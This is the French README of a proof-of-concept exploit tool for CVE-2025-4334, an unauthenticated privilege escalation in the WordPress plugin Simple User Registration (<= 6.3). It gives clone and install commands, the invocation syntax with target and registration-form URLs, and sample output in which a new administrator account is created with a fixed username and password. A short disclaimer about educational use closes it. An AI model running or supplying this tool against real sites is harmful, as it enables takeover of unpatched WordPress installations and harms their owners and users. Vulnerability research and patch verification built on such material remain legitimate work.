
Exploit de preuve de concept pour CVE-2025-4334, une vulnérabilité d'élévation de privilèges dans le plugin WordPress Simple User Registration (<= 6.3), permettant à des attaquants non authentifiés de créer des comptes administrateur.
Titre de l'exploit : Simple User Registration <= 6.3 – Escalade de privilèges non authentifiée Auteur : Gaurav Bhattacharjee (0xgh057r3c0n) ID CVE : CVE-2025-4334
Cet exploit cible une vulnérabilité dans le plugin Simple User Registration pour WordPress (<= v6.3), permettant à des attaquants non authentifiés d'élever leurs privilèges et de créer un nouveau compte administrateur.
Clonez le dépôt et installez les dépendances Python requises :
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt
Dépendances :
requestscoloramapython3 CVE-2025-4334.py -u <base_url> --form <form_url>
Arguments :
-u / --url → URL de base de WordPress (ex. https://target.com/wordpress/)--form → URL complète du formulaire d'inscription (ex. https://target.com/wpr/default-registration/)Exemple :
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/
[*] Fetching form details...
[i] Extracted Nonce : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response : {"success":true,"user_id":2}
[+] Exploitation Successful
[+] Username : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name : 0xgh057r3c0nadmin
[+] Email : [email protected]
[+] Password : Wiz007@8876@
[+] Role : administrator
Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)
Cet outil est fourni à des fins éducatives et de recherche uniquement. Toute utilisation non autorisée contre des systèmes sans permission est illégale. L'auteur décline toute responsabilité en cas d'utilisation abusive.
Ce projet est sous licence MIT License.